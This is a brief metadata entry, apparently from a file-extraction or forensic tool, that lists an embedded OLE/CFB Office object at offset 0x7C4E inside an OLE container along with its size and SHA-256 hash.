embedded_office_off00007c4e.ole embedded-office Embedded OLE/CFB Office body inside ole container at offset 0x7C4E 19378 bytes
SHA-256: a3525485260bc7246221fb4bdc23dd64a750ff4a3ae9446ab94716ad78cae6c3